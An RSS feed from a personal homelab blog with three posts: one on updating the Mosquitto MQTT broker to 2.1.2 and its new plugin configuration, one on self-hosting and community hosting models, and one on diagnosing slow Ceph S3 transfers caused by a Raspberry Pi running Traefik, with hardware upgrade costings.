<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Homelab on ln --help</title>
    <link>https://blog.mei-home.net/categories/homelab/</link>
    <description>Recent content in Homelab on ln --help</description>
    <generator>Hugo -- 0.147.2</generator>
    <language>en</language>
    <lastBuildDate>Sun, 01 Mar 2026 21:27:37 +0100</lastBuildDate>
    <atom:link href="https://blog.mei-home.net/categories/homelab/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Mosquitto: Update to v2.1</title>
      <link>https://blog.mei-home.net/posts/mosquitto-2-1-update/</link>
      <pubDate>Sun, 01 Mar 2026 21:27:37 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mosquitto-2-1-update/</guid>
      <description>It needs a few changes...</description>
      <content:encoded><![CDATA[<p>As part of this weekend&rsquo;s regular service update, I also came across
Mosquitto&rsquo;s new 2.1.2 release. This is my tale&hellip;</p>
<p>I&rsquo;m using <a href="https://mosquitto.org/">Mosquitto</a> as the MQTT broker for my IoT
thermostats and smart plugs. If you&rsquo;re interested, you can find more details on
my setup in <a href="https://blog.mei-home.net/posts/power-measurement/">this</a> and <a href="https://blog.mei-home.net/posts/k8s-migration-17-iot/">this</a>
post.</p>
<p>The <a href="https://mosquitto.org/ChangeLog.txt">changelog</a> of the new release contained
a few interesting points:</p>
<ul>
<li>The acl_file option is deprecated in favour of the acl-file plugin, which is
the same code but moved into a plugin. The acl_file option will be removed
in 3.0.</li>
<li>The password_file option is deprecated in favour of the password-file plugin,
which is the same code but moved into a plugin. The password_file option will
be removed in 3.0.</li>
</ul>
<p>I&rsquo;m using both of these options. And because I was doing the update on a lazy
Sunday morning instead of a Friday evening after work, I decided to be a good
sysadmin and replace the <code>acl_file</code> and <code>password_file</code> options now, instead of
waiting for the release in which they&rsquo;re ultimately getting removed.</p>
<p>The first hurdle was that there doesn&rsquo;t seem to be any good docs on how to use
either the <code>password-file</code> or the <code>acl-file</code> plugins. How do I configure them?
How do I use them? How do I even get them?</p>
<p><strong>Update 2026-03-02</strong>: It turns out that I just wasn&rsquo;t looking properly. The docs
for both the <a href="https://mosquitto.org/documentation/plugins/acl-file/">ACL file plugin</a>
and the <a href="https://mosquitto.org/documentation/plugins/password-file/">Password file plugin</a>
are right there on the <a href="https://mosquitto.org/documentation/">main docs page</a>.
Thanks a lot to <a href="https://fosstodon.org/@ralight">@ralight@fosstodon.org</a> for pointing out
my mistake.</p>
<p>After not having any success in finding any examples, I finally hit upon an idea:
look at the source code. Yet again, three hurrahs for open source software. I
found <a href="https://github.com/eclipse-mosquitto/mosquitto/commit/c522361d359713c4648a92eadfe3312dfa0e4a3e">this commit</a>,
and in it this example Mosquitto config for internal testing:</p>
<pre tabindex="0"><code>listener 1883
allow_anonymous true
plugin ./mosquitto_acl_file.so
plugin_opt_acl_file ./acl_file
</code></pre><p>So first step: Figuring out whether those shared objects are actually shipped
as part of the image.
I had a look into the Mosquitto container and found that at least those two
libs are indeed included:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>podman run -it eclipse-mosquitto:2.1.2-alpine ash
</span></span><span style="display:flex;"><span>find . -iname <span style="color:#e6db74">&#34;*.so&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>./usr/lib/mosquitto_password_file.so
</span></span><span style="display:flex;"><span>./usr/lib/mosquitto_acl_file.so
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span></code></pre></div><p>I ended up with this final config:</p>
<pre tabindex="0"><code>plugin /usr/lib/mosquitto_acl_file.so
plugin_opt_acl_file /mosquitto/config/acl.conf
plugin /usr/lib/mosquitto_password_file.so
plugin_opt_password_file /hl/passwd
</code></pre><p>But I kept getting an error:</p>
<pre tabindex="0"><code>1772364168: Error: Unable to open acl_file &#34;/mosquitto/config/acl.conf&#34;.
1772364168: Error: Plugin returned 13 when initialising.
</code></pre><p>The <code>acl.conf</code> file is mapped into the container via a k8s ConfigMap, so I thought
that perhaps there&rsquo;s something going wrong here?
I checked in a running Pod and saw this:</p>
<pre tabindex="0"><code>/ # ls -Al mosquitto/
total 16
drwxrwsrwx    3 root     1000          4096 Mar  1 11:26 config
drwxrwsr-x    3 mosquitto 1000          4096 Mar  1 11:25 data
drwxr-xr-x    2 mosquitto mosquitto      4096 Feb  9 20:01 log

/ # ls -Al mosquitto/config/
total 4
drwxr-sr-x    2 root     1000          4096 Mar  1 11:26 ..2026_03_01_11_26_50.4252382031
lrwxrwxrwx    1 root     1000            32 Mar  1 11:26 ..data -&gt; ..2026_03_01_11_26_50.4252382031
lrwxrwxrwx    1 root     1000            15 Mar  1 11:26 acl.conf -&gt; ..data/acl.conf
lrwxrwxrwx    1 root     1000            21 Mar  1 11:26 mosquitto.conf -&gt; ..data/mosquitto.conf
</code></pre><p>So I didn&rsquo;t see any issue; the files definitely existed.
After digging even more, I finally found <a href="https://github.com/eclipse-mosquitto/mosquitto/issues/3531">this GitHub issue</a>.
Somebody had the same issue as me. It looks like it was caused by a new
security measure that disables following symlinks by default. After setting the
env variable <code>MOSQUITTO_UNSAFE_ALLOW_SYMLINKS=1</code> to disable that behavior,
Mosquitto finally started up again and has been running nicely since then.</p>
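<p>In the Kubernetes Deployment, that is just one more entry in the container&rsquo;s
environment. A minimal sketch, with the container name as a placeholder:</p>
<pre tabindex="0"><code># excerpt from the Deployment&#39;s Pod spec
containers:
  - name: mosquitto
    image: eclipse-mosquitto:2.1.2-alpine
    env:
      - name: MOSQUITTO_UNSAFE_ALLOW_SYMLINKS
        value: &#34;1&#34;
</code></pre>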
<p>So be a bit cautious when running Mosquitto in a k8s cluster: the update to
v2.1.2 might not work without some small changes.</p>
]]></content:encoded>
    </item>
    <item>
      <title>A Few Thoughts On Self-Hosting and its Viability as a Solution</title>
      <link>https://blog.mei-home.net/posts/self-hosting-meta/</link>
      <pubDate>Mon, 02 Feb 2026 18:30:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/self-hosting-meta/</guid>
      <description>I ramble a bit about self-hosting and some blog posts from last year</description>
      <content:encoded><![CDATA[<p>Please allow me to ramble a bit about a Fediverse post I saw around this time
last year, and a few blog posts discussing self-hosting as a solution to the
dominance of big tech.</p>
<p>It all started with <a href="https://weirder.earth/@arisingvoice/114049359984514099">this post</a>
crossing my timeline last year.</p>
<blockquote>
<p>Are there <em>any</em> guides on self hosting for <em>complete</em> beginners out there? Especially those that have choice paralysis and care about privacy.</p>
<p>Ones that walk you through buying a domain name, setting the DNS or whatever it&rsquo;s called for it, setting up a hosting server (and which to choose), what OS to use on it etc? Or are you just expected to know all this?</p>
<p>We tried a while ago but nobody could figure out how to help us set it all up so we gave up.</p>
<p>Such a guide would be great though.</p></blockquote>
<p>So I thought to myself: Well, I&rsquo;m a Homelabber, and I like writing. And I didn&rsquo;t
actually know of any beginner&rsquo;s guide to self-hosting.</p>
<p>How difficult could it possibly be?</p>
<p>Well dear reader, I read the above post about a year ago. And as you might have
noticed, I&rsquo;ve not actually put out a nice Beginner&rsquo;s Guide to Self-Hosting on
this here blog in the meantime. And that&rsquo;s not for a lack of trying. At all.</p>
<p>I just found that I <em>can&rsquo;t</em>. For the life of me, I just couldn&rsquo;t write a guide.
This is the eighth! draft of this post. Every attempt I made fell into one of
three categories:</p>
<ol>
<li>WAY, WAY too detailed. As in &ldquo;I&rsquo;m 30 minutes of reading time in and haven&rsquo;t even finished the OS choice part yet&rdquo;.</li>
<li>Way too little detail, thinking way too often &ldquo;everyone knows this, surely&rdquo;</li>
<li>The worst kind, where I basically came over like the most arrogant &ldquo;Why not use GNU/Linux?&rdquo; FOSS-bro you&rsquo;ve ever had the misfortune of meeting</li>
</ol>
<p>Particularly the two drafts which ended up in category three were extremely
jarring to read. They genuinely left me sitting there thinking really hard about
whether I&rsquo;m coming across like that in my other blog posts or my Fediverse posts.</p>
<p>I&rsquo;m desperately hoping I don&rsquo;t.</p>
<p>All of these attempts were extremely frustrating. I&rsquo;ve been Homelabbing/self-hosting
for about 15 years now. Why can&rsquo;t I put together a nice, readable guide for
absolute beginners?</p>
<p>I think the problem is that I know all of this stuff. And have known at least the
basics for over a decade now. And I somehow fail to find a healthy balance between
attempting a complete brain dump and leaving &ldquo;important&rdquo; things out.</p>
<p>So I&rsquo;m admitting defeat. I&rsquo;m not the person to write a beginner&rsquo;s guide to self-hosting.</p>
<p>But I also haven&rsquo;t given up entirely yet. While I might have utterly failed to
write an absolute beginner&rsquo;s guide, I still believe that I could write a good
intermediate guide to self-hosting, where I don&rsquo;t explain absolutely everything,
but rather just write up some of the tools I&rsquo;m using and some basic decisions which
need to be taken.</p>
<p>And if you&rsquo;re an absolute beginner in self-hosting, this doesn&rsquo;t mean you&rsquo;re out
of luck. Because <a href="https://mastodon.social/@_elena">Elena Rossini</a>, a European
filmmaker, photographer and writer, is currently writing a <a href="https://blog.elenarossini.com/a-newbies-guide-to-self-hosting-with-yunohost-part-1-reasons-requirements/">series about her recent foray into self-hosting</a>.</p>
<p>The three posts she&rsquo;s written in her series are already better than all of the
drafts I&rsquo;ve done over the past year.</p>
<h2 id="individual-self-hosting-is-no-solution-to-big-tech-dependency">Individual Self-Hosting is no solution to big tech dependency</h2>
<p>There were a couple of posts in the past year about how individual self-hosting
is not the solution to the issue of big tech dependency.</p>
<p>The main post was <a href="https://www.drewlyton.com/story/the-future-is-not-self-hosted/">this one</a>.
It starts out with the issue of Amazon preventing manual downloads of books,
and the author then setting up a new home server running Immich, Calibre Web,
Audiobookshelf and Jellyfin, concentrating on self-hosted local media.</p>
<p>But the conclusion is not that we should all run out and start self-hosting all
the things, individually:</p>
<blockquote>
<p>And this week, I want to share with you how I did it, what I learned, and why I think self-hosting is NOT the future we should be fighting for.</p></blockquote>
<p>And I broadly agree here. To me, self-hosting is a hobby. I like tinkering. I
intentionally spend time on my Homelab to relax, just for the fun of it. So I&rsquo;ve
got more than enough time to maintain all of the services I&rsquo;d like to run. But,
as the above post points out very correctly, all of this takes time. Even more
so once you&rsquo;d like to not only use your services internally, in your home, but
also have the ability to share stuff with other people. Because then you get into
issues of compatibility with what the majority of people are familiar with, and
also into the increased complexity of hosting public-facing services.</p>
<p>Specifically on this topic, there was also a <a href="https://mamot.fr/@thibaultamartin/114963756750234261">Fediverse post</a>
I disagree with quite severely:</p>
<blockquote>
<p>At the individual scale, self-hosting is not a good way to “be in control of my data.”</p>
<p>It’s like saying I do a vegetable garden to be in control of my food. I need much more than I can grow, it’s an inefficient use of my time, and I’m one bad season away from losing it all.</p>
<p>Resilience and transparency are key to be in control of my data and I can’t achieve this alone. This is a social problem, we need to bring solutions as a society.</p></blockquote>
<p>I do believe that self-hosting is a good way to be in control of <em>my</em> data. I&rsquo;ve
been doing it successfully for over a decade now. The only major thing I&rsquo;m not
currently self-hosting is my email, and that&rsquo;s coming soon. It is possible, given
enough time and the right skills.</p>
<p>I also dislike the comparison to being food-independent. I grew up on a farm.
There&rsquo;s exactly zero chance you get to be food-independent as a side gig. But we
don&rsquo;t even have to get into the time investment or tooling. Just looking at the
amount of land that would be needed makes it clear that it&rsquo;s not possible for
anyone who doesn&rsquo;t make it their main job. We had around five family members
engaged in our part-time farming. We had a few fields, and for most of the time
a few pigs that we even slaughtered ourselves. But we weren&rsquo;t even remotely
food-independent. I think the only things we never bought were potatoes and peas,
and that&rsquo;s about it. And that was with five people across three generations
involved in the farming, all as a side gig.</p>
<p>But: This leads me to the main part which rubs me wrong about the Fediverse post:
The absolutism. Both for food production and self-hosting. It&rsquo;s something which
rubs me the wrong way in some corners of the Internet at the moment, mainly in
discussions about boycotting US products or discussions about online privacy.
There&rsquo;s way too many people for whom it has to be either perfect, or it&rsquo;s not
even worth doing at all.</p>
<p>And that&rsquo;s just not true when it comes to replacing big tech services with
self-hosted alternatives. There&rsquo;s still a considerable win in replacing e.g.
Microsoft OneDrive with a Nextcloud instance, even if you&rsquo;re continuing to use
Google for email. It&rsquo;s still a win when the only thing you&rsquo;re self-hosting is
Immich to replace Google Photos. Using Signal instead of WhatsApp is already
progress. You don&rsquo;t have to switch to GrapheneOS to gain more independence
from big tech.</p>
<h2 id="who-does-the-self-hosting">Who does the self-hosting?</h2>
<p>Lyton&rsquo;s blog post asks a central question: If it&rsquo;s not individuals, and
it&rsquo;s not big tech, who does the self-hosting? The author starts out with a nice
metaphor for &ldquo;Everybody self-hosts their own stuff&rdquo;: The suburban internet.
Everyone has a server in their garage, and they&rsquo;re all independent islands of
services. I find some fault with the &ldquo;islands&rdquo; definition here, because today
that&rsquo;s not necessarily true. For example, Nextcloud instances can federate. So
can Fediverse instances for social media, Matrix servers for messaging, even
identity providers like Keycloak have federation capabilities. So I don&rsquo;t think
individual self-hosting would necessarily have to lead to islands or silos.</p>
<p>But the rest of the argument holds: You&rsquo;d still have to have every individual, or
at least every family/friend group, learn the necessary skills for self-hosting.</p>
<p>The solution the post proposes is a more communal approach, where for example
libraries would provide some basic services for every member. And I like this
idea. What comes to mind is my time at university, back in the early 2000s.
After enrolling, everyone got a free email address and some web space for simple tilde
hosting. For CS students, there were additional services like an SVN server and
an issue management system.</p>
<p>One counterargument I would voice: At least here in Germany, the state,
regardless of level, isn&rsquo;t exactly known for the success of its IT projects.
And one more: we&rsquo;re also seeing how our federalized
system leads to every state doing its own thing. It is not too far-fetched to
believe that some sort of &ldquo;citizen cloud&rdquo; program would similarly lead to silos
which can&rsquo;t talk to each other.</p>
<p>But as I&rsquo;ve noted above: While I do think self-hosting everything is perfectly
possible for certain people, it is not on a societal scale. I can do it. Because
it&rsquo;s my main hobby, and the skills I&rsquo;m gathering there are also valuable for
my dayjob. Similarly, the stuff I do in my dayjob is also sometimes relevant to
my self-hosting. If it was just a means to an end to me, I would be self-hosting
a lot less, if anything at all. And not even remotely as well-configured as it
is.</p>
<p>In <a href="https://destructured.net/circle-hosted-future">A circle-hosted future</a>,
L. Rhodes describes a slight variation on the community-hosted idea. Here, the
author proposes smaller hosting groups than libraries or governments, for example
families or friend groups. This would avoid tying yourself to the state instead
of big tech. But it would of course have downsides, as any circle would then
have to know somebody with the necessary technical skills. Rhodes also points
out what&rsquo;s really the main obstacle in all of this, regardless of whether it&rsquo;s
libraries, universities, the state, big tech or your buddy doing the hosting: Trust.</p>
<p>Unless you have the skills to do it all yourself, you will have to trust somebody.
I would very likely be able to trust my buddy the most. For others, it might be
the government, even if just their municipal government.</p>
<h2 id="what-about-associationsclubs">What about associations/clubs?</h2>
<p>One point which both Rhodes and Lyton bring up only in side notes is associations
or clubs. Please note that the following is from a German perspective, I don&rsquo;t
know how clubs and associations work in the rest of the world.</p>
<p>In Germany, associations (Vereine, in German) are well-regulated, enjoy some
protections for their activities under the law and also enjoy some tax benefits.
They need to have a democratic structure to be recognized, and service providers
like banks have lots of experience with catering to their needs. They can own
things as a legal entity, in this case e.g. all the necessary equipment for
hosting services. There are also well-established mechanisms to pay members for
services rendered, e.g. if somebody hosts the club&rsquo;s infrastructure in their
basement.</p>
<p>They have the advantage of being NGOs, so you don&rsquo;t have to put your trust into
a state-provided &ldquo;citizen cloud&rdquo;. At the same time, you&rsquo;ve got direct and formal
influence over the club&rsquo;s dealings, which you wouldn&rsquo;t have if the services were
provided by libraries or universities.</p>
<p>I&rsquo;ve also got some personal experience with an association, specifically a German
shooting club (Schützenverein). For those not familiar with the concept, they are
something of a combination of a sports club and a bit of a
&ldquo;traditions club&rdquo;, if that makes any sense. Their main activity
is air rifle shooting. Although these days, many clubs also
have crossbows, due to some really weird pieces of gun legislation when it comes
to young children. &#x1f937;</p>
<p>My main point being: As shooting clubs, almost all of them have a piece of
shared infrastructure, their shooting range, which is managed by the club, and
in large part maintained by the diverse skills of the club members. Hence why
I think that they&rsquo;re a viable model for running some sort of shared service
infrastructure.</p>
<p>Finally, there&rsquo;s also their openness, when compared to small circles like friend
groups or extended families. You don&rsquo;t actually have to have a friend or family
member who has the necessary skills for self-hosting, you can just join the local
&ldquo;local services&rdquo; club and pay your dues.</p>
<p>One great example of a service-providing German association which is known beyond
Germany is <a href="https://codeberg.org/">Codeberg</a>. They&rsquo;re providing a hosted Git
forge experience somewhat similar to GitHub, but in the form of an association
instead of an LLM-slop-producing leech.</p>
<p>In fact, having written the above, allow me some wishful thinking: An association
which provides a co-hosting space. For people without a garage/basement, who
don&rsquo;t want to put their racks into their living room. With a couple of 1 Gb/s fibers
coming in, perhaps a bit of cooling as well? And a few workbenches and tools,
as a space to work on the machines.</p>
<h2 id="what-im-planning">What I&rsquo;m planning</h2>
<p>Since <em>waves around wildly</em> got as bad as it is, I&rsquo;ve been thinking more and more
about what I can do to improve my local community. And as the only useful skill
I have is Homelabbing, I&rsquo;ve been thinking for a while now about how to make that skill
useful on a wider horizon than just myself. Especially considering that I&rsquo;ve
already got the substrate up and running. There&rsquo;s storage, there&rsquo;s a web
server, there&rsquo;s an entire k8s cluster, and there are backups.</p>
<p>So what would I need?</p>
<ul>
<li>Some interest. I&rsquo;ve got no idea whether anyone who trusts me would actually be interested</li>
<li>User management: If at all possible, I would like to go via Keycloak, which would likely need
a new instance, as Keycloak doesn&rsquo;t seem to be able to separate client access per user</li>
<li>Facilities? Right now, I&rsquo;m hosting my stuff off of a 250 Mb/s down, 40 Mb/s up connection,
with the hosts sitting in my living room</li>
<li>Offsite backups</li>
<li>Public docs</li>
<li>A general idea about which SLAs I could provide</li>
<li>A general idea about which services I would provide
<ul>
<li>I&rsquo;d probably avoid e.g. Mastodon, just because I don&rsquo;t think I&rsquo;d be any good at
all as a moderator</li>
</ul>
</li>
</ul>
<p>Thoughts to mull over for the next few months.</p>
]]></content:encoded>
    </item>
    <item>
      <title>S3 Performance and Homelab Hardware Musings</title>
      <link>https://blog.mei-home.net/posts/s3-perf-and-future-hw/</link>
      <pubDate>Thu, 08 Jan 2026 00:35:03 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/s3-perf-and-future-hw/</guid>
      <description>I finally figured out my S3 performance problems and think about a Homelab Hardware refresh</description>
      <content:encoded><![CDATA[<p>Wherein I figure out why my Ceph S3 is so slow and think about potential
hardware upgrades.</p>
<p>As part of my <a href="https://blog.mei-home.net/posts/go-access/">goaccess post</a>, I had to copy
almost 60 GB of logs from my laptop to my desktop. I decided to do that
via my Ceph S3. And it was very, very slow. There were 185 files to copy, with
a total size just shy of 60 GiB. The majority of that size comes from two Traefik
log files, both around 30 GiB in size. I used <a href="https://rclone.org/">Rclone</a> to
sync the files to an empty directory on my desktop with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rclone sync -P my-s3:public/traefik-log ./
</span></span></code></pre></div><p>And that was very slow. I saw a maximum of 25 MiB/s, that&rsquo;s it. And sure, the
S3 bucket I was copying from was only backed by HDDs, so there&rsquo;s an upper limit.
And my network is only 1 Gb/s, so there&rsquo;s another potential bottleneck. But,
at the same time, 25 MiB/s is still a bit anemic, considering that the HDDs should
be able to do 120 MB/s, and the network should be able to do about the same. This
S3 performance issue has been dogging me for quite a while. I found it in earlier
copy operations as well, including for example my backups, which also go into
S3 buckets via <a href="https://restic.net/">restic</a>.</p>
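<p>For context, the <code>my-s3</code> remote in that Rclone command is just a plain S3-compatible
remote pointed at the RGWs behind my Traefik ingress. A rough sketch of the
<code>rclone.conf</code> entry, with the endpoint and credentials as placeholders:</p>
<pre tabindex="0"><code>[my-s3]
type = s3
provider = Ceph
endpoint = https://s3.example.com
access_key_id = PLACEHOLDER
secret_access_key = PLACEHOLDER
</code></pre>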
<p>Before describing the problem in detail, here is what the overall setup looks
like:</p>
<figure>
    <img loading="lazy" src="s3-overview.svg"
         alt="A diagram showing the setup. It shows five hosts. The first three have one HDD each. Two of them also have one RGW instance each. Then the fourth host has the Traefik instance, and the fifth host is my desktop machine. The two RGW instances each have connections to all three HDDs, and the Traefik instance has connections to both RGWs. The desktop only has one connection, to the Traefik instance."/> <figcaption>
            <p>Setup of RGW access in my Homelab.</p>
        </figcaption>
</figure>

<p>So my desktop contacts the Traefik proxy for access to S3. Traefik, in turn,
contacts the two load-balanced Ceph RGW instances. Those, in turn, are backed by
three HDDs for data storage. Each HDD is in a different host, and the two RGW
instances also run on different hosts. The HDDs and the RGW instances all run
on my three Ceph hosts, while the Traefik instance runs on a non-Ceph
host.</p>
<p>With that out of the way, let&rsquo;s have a look at the problem. Here is the transmission
chart for my RGWs while copying the aforementioned 60 GB from an S3 bucket to
my desktop:</p>
<figure>
    <img loading="lazy" src="traefik-pi4-throughput.png"
         alt="A screenshot of a Grafana time series chart. It shows the bytes send by my Ceph S3 setup. The graph starts at around 0. At 19:55, it starts going up, until it reaches the maximum of about 27 MB/s around 20:03. The plot hovers around that value until about 20:41, when it slowly goes back to zero."/> <figcaption>
            <p>Throughput of my RGW cluster during the transfer.</p>
        </figcaption>
</figure>

<p>As I&rsquo;ve said above, 27 MB/s isn&rsquo;t exactly good throughput in my setup. It should
be topping out at four times that under ideal circumstances, as my HDDs should
be able to manage 120 MB/s at most.</p>
<p>Looking around, I first thought that the disks of my Ceph nodes were fully utilized
by a mere 25 MB/s read. But that wasn&rsquo;t the case. My next thought was the network
on the Ceph nodes, but that also topped out at about 200 Mbit/s. The last thing
I checked was the CPU utilization on the Ceph nodes running the RGW instances.
My thinking being: Perhaps the load of the OSD for disk access combined with the
RGW load was too much? But that also wasn&rsquo;t it. Max CPU load was around 25%.</p>
<p>Then I had an idea: All the traffic needed to go through the Traefik I&rsquo;m using
as my k8s Ingress. So what about the machine running that? And it turned out that
the CPU for that machine was nearly fully loaded during the entire copy process:</p>
<figure>
    <img loading="lazy" src="traefik-pi-cpu.png"
         alt="A screenshot of a Grafana time series chart. It shows the CPU utilization during the copy process, starting at around 12% utilization until 20:00 and then increasing rapidly to 84%. It then stays around that value until about 20:43, when it returns to the previous 12%. The graph also shows the different types of CPU utilization. Throughout the entire duration, about 30% of the CPUs is taken up by softirq, another 30% by sys and only 17% by user usage."/> <figcaption>
            <p>CPU utilization on the Pi 4 running Traefik during the copy operation.</p>
        </figcaption>
</figure>

<p>The poor Pi 4 is being pushed far beyond its capabilities here, it seems. To confirm that
this was really due to CPU power, I repeated the test. The overall setup is the
same, just that now, I scheduled the Traefik Ingress Pod on one of my Ceph hosts.
It&rsquo;s a 12th Gen Intel i3-12100T. In contrast to the Pi, it was able to do about
93 MB/s, and instead of over 40 minutes, it only needed 12 for the same copy
operation:</p>
<figure>
    <img loading="lazy" src="traefik-beefy-throughput.png"
         alt="And another screenshot of a Grafana time series plot. It again shows the throughput per second of my RGW cluster. It again starts near zero, and slowly goes up starting at 12:21, before it reaches its maximum of about 93 MB/s at 12:24. It keeps that throughput until 12:32, when it slowly start going down again, hitting near-zero again at 12:34."/> <figcaption>
            <p>Throughput of my RGW cluster during the copy operation, with Traefik running on a beefier machine.</p>
        </figcaption>
</figure>
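<p>For the test, I only had to pin the Traefik Pod to that host. A simple
<code>nodeSelector</code> on the Pod template is enough for this kind of experiment;
a minimal sketch, with the hostname label value as a placeholder:</p>
<pre tabindex="0"><code>spec:
  template:
    spec:
      nodeSelector:
        # placeholder: node name of the i3-12100T Ceph host
        kubernetes.io/hostname: ceph-host-1
</code></pre>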

<p>And these 93 MB/s are probably not the max that my RGW cluster can push, as I
think that the Traefik Ingress is again holding it back. Only this time not due
to CPU, but rather due to networking:</p>
<figure>
    <img loading="lazy" src="network-usage.png"
         alt="Another screenshot of a Grafana time series chart. This time, it shows the receiving and transmitting network traffic for the host running Traefik. It shows that at for the whole transmission, 924 Mbit/s are transmitted, and about 700 Mbit/s are received."/> <figcaption>
            <p>Network utilization of the host running Traefik. Left Y axis is receiving, right Y axis is sending.</p>
        </figcaption>
</figure>

<p>While there is still some breathing room on the 1 Gbit/s connection in the
RX direction, with only 700 Mbit/s used, the TX direction is pretty much full,
with 924 Mbit/s. I believe there are likely still a few MB/s to be had for the
S3 copy. Because the host here is also a Ceph host. So besides sending out
data from Traefik, it is also sending out data from its Ceph OSD to the other
RGW running on another host. That&rsquo;s likely the majority of the 700 Mbit/s of
incoming data.</p>
<p>Sadly, I don&rsquo;t have any powerful hosts which are not also Ceph hosts to test
the theory. Everything else in the Homelab is currently either a Pi 4 or an
old Pentium N3710.</p>
<h2 id="future-hardware-thoughts">Future hardware thoughts</h2>
<p>I&rsquo;ve thought about updating the 8 Raspberry Pi CM4 8GB which form the main
compute in my Homelab since <a href="https://blog.mei-home.net/posts/control-plane-pi5/">my issues with my control plane nodes</a>
last year. The Pi 4 is now over 6 years old, and it wasn&rsquo;t a performance beast
to begin with. But the thing is: Besides very specific instances like what I
described above or my control plane issues, the performance of the Pi 4 is still
perfectly fine for everything I&rsquo;m doing. Could my Grafana dashboards load a bit
faster during the first load of the day? Sure. Could the Nextcloud UI be a bit
more performant? Yes. But it really isn&rsquo;t <em>that</em> bad.</p>
<p>Still, I think it&rsquo;s time to at least consider an update. There are three basic
options I&rsquo;m currently seeing:</p>
<ol>
<li>Do a 1:1 replacement, replacing all of the Pi CM4 with Pi CM5</li>
<li>Expand the RAM in the Ceph nodes and get rid of the 8 CM4</li>
<li>Replace the Pi CM4 with three or four SFF machines</li>
</ol>
<h3 id="switching-to-the-pi-5">Switching to the Pi 5</h3>
<p>By now, the Raspberry Pi CM5 has been released, and the Turing Pi 2 board, which
I have my CM4 in at the moment, might support the CM5 out of the box. <em>Might</em>
being the important word here. They had a blog post back in December which showed
a Turing Pi 2 board with CM5, but that blog post has now vanished. I looked at
their Discord, and it seems the general support wasn&rsquo;t quite as good as that
blog post made it sound. In particular, flashing the CM5 apparently wasn&rsquo;t quite
working properly yet. Which wouldn&rsquo;t matter to me too much - my worker nodes do
netboot anyway. So let&rsquo;s put this option into a maybe.</p>
<p>Provided that the CM5 actually works in the Turing Pi 2 boards, this would be
the lowest effort approach. I would just take out all of the CM4 and replace them
with CM5. Looking at my trusted Pi dealer <a href="https://www.berrybase.de/">BerryBase</a>,
each CM5 in the no-eMMC, no-WiFi/Bluetooth variant with 8 GB of RAM would cost
me 86,90 €, for a total of 695,20 €. Add to that some passive heatsinks for around
50 bucks total, and the entire upgrade would cost me about 750 € shipped.</p>
<p><strong>Total Effort:</strong> Minimal<br>
<strong>Total Costs:</strong> About 750 €</p>
<h3 id="moving-the-entire-homelab-onto-the-three-current-ceph-hosts">Moving the entire Homelab onto the three current Ceph hosts</h3>
<p>First, what would I need to replace the 8 CM4? I don&rsquo;t think CPU is that much
of a bottleneck. Most of the time, my Homelab&rsquo;s combined CPUs are about 87% idle.
More interesting is that I would need 8x8 GB = 64 GB of RAM. Sure, I would
probably need a bit less, because I wouldn&rsquo;t need all the foundational services
eight times, but let&rsquo;s still use the 64 GB as a ballpark.</p>
<p>I&rsquo;ve currently got three hosts running my Ceph cluster. First an Odroid H3.
I would like to get rid of this one to be honest, as it&rsquo;s not really fit for
purpose. It has two SATA data and power connectors, and that&rsquo;s it. So in this
scheme, it would definitely need to be replaced entirely. Before looking at
replacements, let&rsquo;s look at the other two hosts.</p>
<p>The next one is my old home server, with an AMD A10-9700e 3 GHz CPU and 16 GB
of RAM. The board supports at most 32 GB. Not great, but also not terrible.
I&rsquo;d need a 32 GB kit instead of a 16 GB kit because the board only has two
RAM slots. Looking around, a 32 GB kit would be somewhere around 270 €. For my
future readers: it&rsquo;s the beginning of 2026, and LLM data centers are currently
eating hardware like there&rsquo;s no tomorrow.</p>
<p>The last host is the newest, it&rsquo;s running an Intel i3-12100T and already has
32 GB of RAM. Another 32 GB should be fine here, so that would be another
270 €.</p>
<p>Then there&rsquo;s the replacement for the Odroid H3. The following is just from a quick
search; I could likely get it cheaper.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Part</th>
          <th style="text-align: right">Price</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">Intel Core Ultra 5 225T</td>
          <td style="text-align: right">250 €</td>
      </tr>
      <tr>
          <td style="text-align: right">ASUS PRIME B860-PLUS</td>
          <td style="text-align: right">158 €</td>
      </tr>
      <tr>
          <td style="text-align: right">GSkill Flare DDR5-6000 2x16 GB</td>
          <td style="text-align: right">328 €</td>
      </tr>
      <tr>
          <td style="text-align: right">Noctua NH-L9x65 CPU Cooler</td>
          <td style="text-align: right">60 €</td>
      </tr>
      <tr>
          <td style="text-align: right">beQuiet! Pure Power 13M 650W</td>
          <td style="text-align: right">101 €</td>
      </tr>
      <tr>
          <td style="text-align: right">Kingston 512 GB NVMe SSD</td>
          <td style="text-align: right">147 €</td>
      </tr>
      <tr>
          <td style="text-align: right">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</td>
          <td style="text-align: right">&mdash;&mdash;&ndash;</td>
      </tr>
      <tr>
          <td style="text-align: right">Total</td>
          <td style="text-align: right">1044 €</td>
      </tr>
  </tbody>
</table>
<p>As I said, mostly quick and dirty. I would have loved to calculate with 64 GB,
but those DDR5 RAM prices are certainly something else.</p>
<p>So with this, I would end up with the same amount of RAM as before.</p>
<p>The effort would be moderate. I would need to build the new machine, and then
migrate the Ceph OSDs over to it from the H3. I could then of course leave the
H3 running as well and use that as a worker?</p>
<p>But the cost would be quite significant, compared to the CM5 replacement.</p>
<p><strong>Total Effort:</strong> Moderate<br>
<strong>Total Costs:</strong> 270 + 270 + 1044 = 1584 €</p>
